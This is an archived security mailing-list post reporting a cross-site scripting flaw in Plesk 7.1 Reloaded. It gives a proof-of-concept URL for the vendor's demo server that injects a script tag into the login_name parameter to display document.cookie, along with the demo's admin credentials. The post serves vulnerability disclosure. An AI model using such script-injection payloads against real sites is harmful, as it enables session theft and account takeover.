| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <002801c489c0$41e50230$1b0010ac@thesur> From: sourvivor at phreaker.net (sourvivor) Subject: XSS in Plesk 7.1 Reloaded This bug was tested only in website plesk demo (plesk 7.1 reloaded). proof of concept: Login first in http://plesk7r.demo.sw-soft.com:8443/ (Login: admin , password: plesk), then go to: http://plesk7r.demo.sw-soft.com:8443/login_up.php3?login_name="><script>alert(document.cookie)</script><"&passwd=TheSur Sourvivor, www.thesur.com/sourvivor/sourvivor.asc
Powered by blists - more mailing lists